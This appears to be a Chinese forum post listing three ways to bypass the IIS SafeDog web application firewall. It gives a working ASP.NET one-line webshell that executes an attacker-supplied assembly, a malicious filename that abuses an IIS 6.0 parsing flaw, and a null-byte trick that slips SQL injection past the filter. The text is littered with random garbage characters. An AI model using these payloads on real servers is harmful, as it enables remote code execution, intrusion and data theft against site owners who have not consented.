1、绕过IIS安全狗的一句话。
`2 I5 e6 s" H+ G: Z% N前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
: x: Y; Z6 w6 c6 N<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。, e2 |4 Z1 I; p2 F1 q. w
6 h* F0 T% V$ {/ p* p
2、IIS6.0解析漏洞遇到安全狗。
( O: ]' {* v9 D5 }; m# S. d! u1 i; t文件名为
( y9 G5 [$ H' W$ ]9 _# K, w" }http://www.xxxxx.com/sh3llc0de.asp;1.jpg, P9 z1 ^# K; r! [
6 o) p4 E$ {! t" f9 I这样的会被IIS安全狗果断屏蔽。
. W/ h$ H" n0 S' {; `2 I改成如下名称,IIS6一样会解析:
- S* H* k3 \4 D: X1 a( W9 }( Iwww.xxxxx.com/;1.asp;1.jpg
# s. B8 e; Y& j% k \( d1 \8 I, j# a! H* A$ V8 s% M
3、安全狗的注入绕过。
" K2 d2 |: s5 G7 k8 ^% M \, I4 b9 z常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
6 r+ t7 P# P- Y8 ~, y+ i& Z1 w但如果:* I4 s% q+ {, W, J( P5 h
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1: f* C3 z- p3 I# X e
就可以成功绕过了。/ \5 u0 j3 p# A e# X
. O* y6 T& f: g) R* ?* G$ j+ p1 x, Q v& G
|